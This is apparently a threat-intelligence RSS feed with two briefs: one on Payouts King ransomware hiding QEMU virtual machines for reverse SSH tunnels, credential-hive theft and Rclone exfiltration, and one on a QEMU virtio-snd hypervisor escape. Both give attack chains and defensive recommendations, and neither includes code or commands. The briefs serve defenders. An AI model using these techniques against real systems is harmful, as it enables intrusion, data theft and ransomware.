https://feed.craftedsignal.io/tags/qemu/Trending threats, MITRE ATT&CK coverage, and detection metadata — refreshed continuously.Hugoenhello@craftedsignal.iohello@craftedsignal.ioSat, 18 Apr 2026 12:00:00 +0000https://feed.craftedsignal.io/briefs/2026-04-payouts-king-qemu/Sat, 18 Apr 2026 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-payouts-king-qemu/The Payouts King ransomware is leveraging QEMU VMs as a reverse SSH backdoor to execute payloads, store malicious files, and establish covert remote access tunnels, bypassing endpoint security measures.The Payouts King ransomware, associated with the GOLD ENCOUNTER threat group, is utilizing QEMU, an open-source CPU emulator, to run hidden Alpine Linux virtual machines (VMs) on compromised Windows systems, effectively bypassing endpoint security solutions. This technique allows attackers to execute malicious payloads, store sensitive data, and create covert remote access tunnels over SSH without being detected by host-based security tools. Observed since November 2025 (tracked as STAC4713), this campaign initially exploited exposed SonicWall VPNs and the SolarWinds Web Help Desk vulnerability (CVE-2025-26399). More recent attacks have leveraged exposed Cisco SSL VPNs and Microsoft Teams phishing campaigns to deliver payloads. The attackers are likely tied to former BlackBasta affiliates based on similar initial access methods. This tactic enables persistence, elevated privileges, and data exfiltration while evading detection.

Attack Chain

1. Initial Access: Attackers gain initial access through exposed SonicWall VPNs, Cisco SSL VPNs, or by exploiting the SolarWinds Web Help Desk vulnerability (CVE-2025-26399). Alternatively, they use Microsoft Teams phishing, tricking employees into downloading and executing malicious files via QuickAssist.
2. Payload Delivery: In some instances, a legitimate ADNotificationManager.exe binary is used to sideload a Havoc C2 payload (vcruntime140_1.dll).
3. QEMU Deployment: A scheduled task named ‘TPMProfiler’ is created to launch a hidden QEMU VM as SYSTEM, utilizing virtual disk files disguised as databases and DLL files.
4. VM Configuration: The QEMU VM runs Alpine Linux (version 3.22.0), containing attacker tools such as AdaptixC2, Chisel, BusyBox, and Rclone.
5. Reverse SSH Tunnel: Port forwarding is set up to establish a reverse SSH tunnel, providing covert access to the infected host.
6. Credential Access: Attackers use VSS (vssuirun.exe) to create a shadow copy, then use the print command over SMB to copy NTDS.dit, SAM, and SYSTEM hives to temp directories.
7. Data Exfiltration: Rclone is leveraged to exfiltrate data to a remote SFTP location or other exfiltration methods, such as FTP, are used.
8. Encryption and Extortion: The Payouts King ransomware encrypts systems using AES-256 (CTR) with RSA-4096 with intermittent encryption for larger files. Ransom notes are dropped, directing victims to leak sites on the dark web.

Impact

Successful Payouts King ransomware attacks can result in significant data loss, system downtime, and financial repercussions for victim organizations. The use of QEMU VMs provides an additional layer of stealth, making detection and remediation more challenging. Targeted sectors are not specified in this report, but the use of exposed VPNs and phishing suggests a broad targeting scope. The ransom demands and potential data leaks on the dark web further compound the damage.

Recommendation

• Monitor for unauthorized QEMU installations and suspicious scheduled tasks running with SYSTEM privileges, as these are key indicators of compromise (see Overview).
• Implement network monitoring to detect unusual SSH port forwarding and outbound SSH tunnels on non-standard ports, which could indicate a reverse SSH tunnel (see Attack Chain).
• Deploy the Sigma rule “Detect ADNotificationManager Sideloading Havoc C2” to identify instances where ADNotificationManager.exe is used to sideload the Havoc C2 payload (vcruntime140_1.dll) (see Rules).
• Review and patch CVE-2025-26399 in SolarWinds Web Help Desk and apply necessary security measures for exposed SonicWall and Cisco SSL VPNs to prevent initial access (see Attack Chain).
• Monitor for processes creating shadow copies (vssuirun.exe) followed by unusual file access patterns (NTDS.dit, SAM, SYSTEM hives) via SMB, indicative of credential theft (see Attack Chain).

]]>criticalthreatpayouts-kingransomwareqemuvmdefense-evasionhttps://feed.craftedsignal.io/briefs/2026-03-qemu-escape/Thu, 19 Mar 2026 05:19:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-03-qemu-escape/An unpatched vulnerability in QEMU's virtio-snd component allows for a hypervisor escape due to an uncontrolled heap overflow.A recently disclosed vulnerability in the QEMU virtualization platform allows a malicious guest operating system to escape the hypervisor and potentially execute code on the host system. The vulnerability resides in the virtio-snd component, which emulates a sound card for virtual machines. The root cause is an uncontrolled heap overflow that can be triggered by a specially crafted audio stream sent from the guest to the host. While specific details of the vulnerability and its exploitation are not provided in the source document, it is important for defenders to understand the potential impact of such a vulnerability and take appropriate measures to mitigate the risk. Successfully exploiting this type of vulnerability would allow an attacker to gain complete control over the underlying host system.

Attack Chain

1. Attacker gains initial access to a guest virtual machine (VM) through a compromised application or vulnerable service running within the VM.
2. The attacker leverages their access within the guest VM to send a specially crafted audio stream to the emulated virtio-snd device.
3. The crafted audio stream triggers an uncontrolled heap overflow within the QEMU process on the host system.
4. The heap overflow corrupts memory on the host system, potentially overwriting critical data structures or code.
5. The attacker carefully manipulates the heap overflow to overwrite function pointers or other execution control data within the QEMU process.
6. When the QEMU process attempts to execute the overwritten function pointer, control is redirected to attacker-controlled code.
7. The attacker’s code executes within the context of the QEMU process on the host system, allowing them to bypass the VM’s isolation.
8. The attacker escalates privileges to gain root access on the host and compromise the entire system.

Impact

Successful exploitation of this QEMU hypervisor escape vulnerability allows a malicious guest operating system to gain complete control over the host system. This can lead to data theft, system compromise, and further lateral movement within the network. The potential impact is significant, especially in cloud environments where multiple VMs share the same physical hardware. Even though specific victim numbers are unavailable, the wide deployment of QEMU implies a broad scope of potential targets across various sectors.

Recommendation

• Monitor process creation events on the hypervisor host for QEMU processes spawning child processes with unexpected command-line arguments, as this could indicate exploitation (see rule: “Detect QEMU Process Spawning Shell”).
• Enable network connection logging for QEMU processes on the hypervisor host to detect connections to unusual or malicious IP addresses, which may be used for command and control after a hypervisor escape (see rule: “Detect QEMU Outbound Network Connection”).
• Investigate any unusual or suspicious behavior within guest VMs, such as unexpected resource utilization or network activity, as this may indicate an attempt to exploit the virtio-snd vulnerability.

]]>criticalthreatvirtualizationhypervisorqemuvirtio-sndheap overflowhypervisor escape